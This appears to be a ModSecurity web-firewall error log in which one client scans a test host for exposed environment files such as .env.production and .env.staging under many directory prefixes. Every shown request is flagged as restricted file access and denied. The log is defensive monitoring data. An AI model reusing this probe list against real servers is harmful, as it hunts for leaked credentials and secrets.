[Sat Mar 21 04:10:17.030415 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env.staging"] [unique_id "ab4MGRsiL8ED2XitCKA8SAAAAAI"]
[Sat Mar 21 04:10:17.030575 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env.staging"] [unique_id "ab4MGRsiL8ED2XitCKA8SAAAAAI"]
[Sat Mar 21 04:10:17.324737 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /demo/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env.staging"] [unique_id "ab4MGRsiL8ED2XitCKA8SQAAAAI"]
[Sat Mar 21 04:10:17.324906 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env.staging"] [unique_id "ab4MGRsiL8ED2XitCKA8SQAAAAI"]
[Sat Mar 21 04:10:17.325066 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env.staging"] [unique_id "ab4MGRsiL8ED2XitCKA8SQAAAAI"]
[Sat Mar 21 04:10:17.619191 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env.local"] [unique_id "ab4MGRsiL8ED2XitCKA8SgAAAAI"]
[Sat Mar 21 04:10:17.619353 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env.local"] [unique_id "ab4MGRsiL8ED2XitCKA8SgAAAAI"]
[Sat Mar 21 04:10:17.619510 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env.local"] [unique_id "ab4MGRsiL8ED2XitCKA8SgAAAAI"]
[Sat Mar 21 04:10:17.913640 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stg/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env.production"] [unique_id "ab4MGRsiL8ED2XitCKA8SwAAAAI"]
[Sat Mar 21 04:10:17.913824 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env.production"] [unique_id "ab4MGRsiL8ED2XitCKA8SwAAAAI"]
[Sat Mar 21 04:10:17.913994 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env.production"] [unique_id "ab4MGRsiL8ED2XitCKA8SwAAAAI"]
[Sat Mar 21 04:10:18.207982 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env.production"] [unique_id "ab4MGhsiL8ED2XitCKA8TAAAAAI"]
[Sat Mar 21 04:10:18.208139 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env.production"] [unique_id "ab4MGhsiL8ED2XitCKA8TAAAAAI"]
[Sat Mar 21 04:10:18.208272 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env.production"] [unique_id "ab4MGhsiL8ED2XitCKA8TAAAAAI"]
[Sat Mar 21 04:10:18.502679 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker.dev"] [unique_id "ab4MGhsiL8ED2XitCKA8TQAAAAI"]
[Sat Mar 21 04:10:18.502936 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker.dev"] [unique_id "ab4MGhsiL8ED2XitCKA8TQAAAAI"]
[Sat Mar 21 04:10:18.503137 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker.dev"] [unique_id "ab4MGhsiL8ED2XitCKA8TQAAAAI"]
[Sat Mar 21 04:10:18.797164 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.staging"] [unique_id "ab4MGhsiL8ED2XitCKA8TgAAAAI"]
[Sat Mar 21 04:10:18.797325 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.staging"] [unique_id "ab4MGhsiL8ED2XitCKA8TgAAAAI"]
[Sat Mar 21 04:10:18.797469 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.staging"] [unique_id "ab4MGhsiL8ED2XitCKA8TgAAAAI"]
[Sat Mar 21 04:10:19.091532 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /product/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env.production"] [unique_id "ab4MGxsiL8ED2XitCKA8TwAAAAI"]
[Sat Mar 21 04:10:19.091684 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env.production"] [unique_id "ab4MGxsiL8ED2XitCKA8TwAAAAI"]
[Sat Mar 21 04:10:19.091848 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env.production"] [unique_id "ab4MGxsiL8ED2XitCKA8TwAAAAI"]
[Sat Mar 21 04:10:19.479775 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env"] [unique_id "ab4MGxsiL8ED2XitCKA8UAAAAAI"]
[Sat Mar 21 04:10:19.479934 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env"] [unique_id "ab4MGxsiL8ED2XitCKA8UAAAAAI"]
[Sat Mar 21 04:10:19.480089 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env"] [unique_id "ab4MGxsiL8ED2XitCKA8UAAAAAI"]
[Sat Mar 21 04:10:19.812422 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /user/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/user/.env.local"] [unique_id "ab4MGxsiL8ED2XitCKA8UQAAAAI"]
[Sat Mar 21 04:10:19.812575 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/user/.env.local"] [unique_id "ab4MGxsiL8ED2XitCKA8UQAAAAI"]
[Sat Mar 21 04:10:19.812728 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/user/.env.local"] [unique_id "ab4MGxsiL8ED2XitCKA8UQAAAAI"]
[Sat Mar 21 04:10:20.176669 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env.production"] [unique_id "ab4MHBsiL8ED2XitCKA8UgAAAAI"]
[Sat Mar 21 04:10:20.176829 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env.production"] [unique_id "ab4MHBsiL8ED2XitCKA8UgAAAAI"]
[Sat Mar 21 04:10:20.176985 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env.production"] [unique_id "ab4MHBsiL8ED2XitCKA8UgAAAAI"]
[Sat Mar 21 04:10:20.649360 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /marketing/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env.production"] [unique_id "ab4MHBsiL8ED2XitCKA8UwAAAAI"]
[Sat Mar 21 04:10:20.649513 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env.production"] [unique_id "ab4MHBsiL8ED2XitCKA8UwAAAAI"]
[Sat Mar 21 04:10:20.649670 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env.production"] [unique_id "ab4MHBsiL8ED2XitCKA8UwAAAAI"]
[Sat Mar 21 04:10:21.267219 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env.local"] [unique_id "ab4MHRsiL8ED2XitCKA8VQAAAAI"]
[Sat Mar 21 04:10:21.267376 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env.local"] [unique_id "ab4MHRsiL8ED2XitCKA8VQAAAAI"]
[Sat Mar 21 04:10:21.267519 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env.local"] [unique_id "ab4MHRsiL8ED2XitCKA8VQAAAAI"]
[Sat Mar 21 04:10:21.565553 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apis/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env.production"] [unique_id "ab4MHRsiL8ED2XitCKA8VgAAAAI"]
[Sat Mar 21 04:10:21.565721 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env.production"] [unique_id "ab4MHRsiL8ED2XitCKA8VgAAAAI"]
